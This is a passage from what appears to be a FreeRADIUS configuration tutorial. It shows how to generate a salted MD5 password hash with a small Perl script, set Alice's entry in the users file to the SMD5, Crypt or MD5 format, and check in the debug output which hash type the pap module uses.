$ctx->add($salt);
print encode_base64($ctx->digest . $salt, '')."\n";

Make the 4088_04_smd5.pl file executable:

chmod 755 4088_04_smd5.pl

Get the SMD5 value for passme using a salt value of salt:

./4088_04_smd5.pl passme salt

Remember that you should use a random value for the salt; we only used salt here for the demonstration. Use this output and update Alice's entry in the users file to:

"alice" SMD5-Password := "Vr6uPTrGykq4yKig67v5kHNhbHQ="

Restart the FreeRADIUS server in debug mode and run the authentication request against it again. Ensure that pap now uses the SMD5 password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using SMD5 encryption.
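Pulling the three formats together, Alice's check entry in the users file will have taken one of the following forms by the end of this exercise (only one should be active at a time, and the hash values are the ones generated in the steps above):

"alice" Crypt-Password := "sa85/iGj2UWlA"
"alice" MD5-Password := "ugGBYPwm4MwukpuOBx8FLQ=="
"alice" SMD5-Password := "Vr6uPTrGykq4yKig67v5kHNhbHQ="

Whichever format is in place, the pap module reports the hash type it is using in the debug output, which is the quickest way to confirm that the right entry is being read.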